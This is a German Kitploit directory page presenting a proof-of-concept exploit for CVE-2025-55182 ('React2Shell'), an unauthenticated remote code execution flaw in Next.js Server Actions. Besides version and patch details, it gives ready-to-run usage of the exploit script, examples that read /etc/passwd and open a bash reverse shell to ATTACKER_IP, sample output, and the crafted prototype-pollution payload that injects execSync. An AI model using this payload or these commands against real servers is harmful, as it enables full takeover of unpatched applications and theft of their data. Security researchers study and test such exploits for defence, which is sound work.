Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nextjs-CVE-2025-55182 — Proof-of-Concept-Exploit für kritische, nicht authentifizierte RCE in Next.js Server Actions über die Deserialisierung des React Flight Protocol, die die Ausführung beliebiger Befehle auf verwundbaren Servern ermöglicht. | Kitploit
Tools/GitHubGitHub/d0cnull/nextjs-cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHub
d0cnull/nextjs-cve-2025-55182

nextjs-CVE-2025-55182

Proof-of-Concept-Exploit für kritische, nicht authentifizierte RCE in Next.js Server Actions über die Deserialisierung des React Flight Protocol, die die Ausführung beliebiger Befehle auf verwundbaren Servern ermöglicht.

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 / CVE-2025-66478 (React2Shell) - Next.js Remote Code Execution (RCE) PoC

Kritische Schwachstelle in Next.js Server Actions, die eine nicht authentifizierte Remote Code Execution über die Deserialisierung des React Flight Protocol ermöglicht

Übersicht

Dieses Repository enthält einen Proof of Concept (PoC) für die kritische RCE-Schwachstelle, die Next.js-Anwendungen betrifft, die Server Actions (React Server Functions) verwenden.

DetailInfo
CVECVE-2025-55182 / CVE-2025-66478
SchweregradKritisch (CVSS 10.0)
Betroffenes ReactReact 19.0.0, 19.1.0, 19.1.1, 19.2.0
Betroffenes Next.jsNext.js 15.x, 16.x, 14.3.0-canary.77+
Nicht betroffenNext.js 14.x stable, 13.x, Pages Router, Edge Runtime
Behoben in Next.js15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
Behoben in React19.0.1, 19.1.2, 19.2.1
TypRemote Code Execution (RCE)
Authentifizierung erforderlichKeine

Beschreibung der Schwachstelle

Die Schwachstelle liegt darin, wie das React Flight Protocol Chunks während der Verarbeitung von Server Actions deserialisiert. Ein Angreifer kann über manipulierte Formulardaten Prototype Pollution ausnutzen, um:

  1. Auf den Function-Konstruktor über die Traversierung der Prototyp-Kette zuzugreifen (__proto__)
  2. Beliebigen JavaScript-Code auf dem Server auszuführen
  3. Eine vollständige Remote Code Execution ohne Authentifizierung zu erreichen

Dies geschieht vor jeder Validierung der Server Action, wodurch sie auf jeder Next.js-App mit aktivierten Server Actions ausnutzbar ist.

Betroffene Anwendungen

Jede Next.js-Anwendung ist verwundbar, wenn:

  • Server Actions verwendet (Standard im App Router)
  • Next.js 15.x oder 16.x ausführt (oder 14.3.0-canary.77+)
  • Keine spezifischen Gegenmaßnahmen implementiert sind

Verwendung

Voraussetzungen

root@kitploit:~
pip install requests

PoC ausführen

root@kitploit:~
python3 poc.py <TARGET_URL> "<COMMAND>"

Beispiele

root@kitploit:~
# Test command execution
python3 poc.py http://localhost:3000 "id"

# Read sensitive files
python3 poc.py http://localhost:3000 "cat /etc/passwd"

# Reverse shell (for authorized testing only)
python3 poc.py http://localhost:3000 "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Beispielausgabe

root@kitploit:~
$ python3 poc.py http://localhost:3000 "whoami"
500
0:{"a":"$@1","f":"","b":"development"}
1:E{"digest":"www-data","message":"NEXT_REDIRECT","stack":[],"env":"Server"}

Die Befehlsausgabe erscheint im Feld digest.

Technische Details

Der Exploit nutzt den Chunk-Auflösungsmechanismus des React Flight Protocol:

root@kitploit:~
crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('{cmd}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

Angriffskette:

  1. Prototyp-Traversierung über $1:__proto__:then
  2. Zugriff auf den Function-Konstruktor über $1:constructor:constructor
  3. Einschleusen beliebigen Codes über das Feld _prefix
  4. Code wird während der Deserialisierung ausgeführt (pre-auth)

Gegenmaßnahmen

Sofort aktualisieren:

root@kitploit:~
npm install next@latest
# or
pnpm update next

Behobene Versionen: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Hinweis: Next.js 14.x stable und 13.x sind NICHT verwundbar.

Haftungsausschluss

⚠️ Dieser PoC dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken.

Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben. Die Autoren übernehmen keine Verantwortung für Missbrauch.

Credits

Basiert auf der ursprünglichen Forschung von @msanft. Die volle Anerkennung für die Entdeckung der Schwachstelle und den ursprünglichen PoC gebührt ihnen.

Referenzen

  • Ursprüngliche Forschung zu CVE-2025-55182
  • Offizielles CVE-Advisory von Next.js
  • Wiz Research - React2Shell-Analyse
  • React Flight Protocol
  • NIST NVD - CVE-2025-55182

Schlüsselwörter

Next.js RCE, Next.js-Schwachstelle, CVE-2025-55182, CVE-2025-66478, React2Shell, React-Server-Components-Exploit, Next.js Server Actions RCE, Prototype Pollution Next.js, React-Flight-Protocol-Schwachstelle, Next.js-Sicherheit, Next.js Remote Code Execution, Next.js Exploit PoC, Server-Actions-Schwachstelle, React RSC RCE

Tool herunterladen